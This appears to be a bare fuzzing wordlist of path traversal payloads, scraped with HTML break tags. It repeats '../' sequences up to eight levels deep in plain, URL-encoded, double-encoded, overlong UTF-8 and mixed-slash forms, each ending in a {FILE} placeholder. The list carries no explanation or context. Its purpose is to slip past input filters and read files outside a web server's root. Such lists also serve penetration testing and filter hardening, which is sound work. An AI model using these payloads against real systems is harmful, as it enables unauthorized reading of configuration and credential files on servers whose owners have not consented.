..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
..%%35%63{FILE}<br />
..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
\../{FILE}<br />
\../\../{FILE}<br />
\../\../\../{FILE}<br />
\../\../\../\../{FILE}<br />
\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../\../{FILE}<br />
/..\{FILE}<br />
/..\/..\{FILE}<br />
/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
